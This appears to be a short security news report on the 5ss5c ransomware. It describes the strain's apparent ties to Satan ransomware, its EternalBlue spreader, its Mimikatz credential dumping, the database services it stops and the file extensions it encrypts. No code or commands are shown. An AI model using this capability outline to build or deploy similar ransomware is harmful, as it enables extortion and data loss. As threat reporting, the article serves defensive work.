A new ransomware strain dubbed 5ss5c encrypts only certain files and stops database-related services and processes.
5ss5c ransomware believed to be developed by threat actors behind Satan, DBGer, Lucky and Iron ransomware.
The threat actors behind the ransomware actively developing the ransomware, last April they have added EternalBlue exploit functionality with the ransomware.
Blaze Security believes that 5ss5c is active since at least from November 2019 and the ransomware is still in development.
The ransomware includes a downloader, spreader modules. It uses Certutil to check the download is successful or not.
5ss5c includes several Satan ransomware artefacts includes Tactics, Techniques, and Procedures, when compared to Satan, 5ss5c uses multiple packers to protect their droppers and payloads.
Following are the tools it downloads
- Spreader (EternalBlue and hardcoded credentials);
- Mimikatz and what appears another password dumper/stealer;
- The actual ransomware.
How the Ransomware Operates
The ransomware contains a scanning module ‘SSSS_Scan‘; and an encryption module ‘5ss5c_CRYPT‘. It contains an exception list, avoid encrypting those files and folders. Also, it stops the database process if any.
It encrypts files only with the following extensions, mostly compressed file;
7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip
Once encryption completed it creates a text file in Chinese name, translated as “How to decrypt my file_.txt” and the ransom note also in Chinese.
The new 5ss5c ransomware is likely to replace Satan, but it needs more enhancements.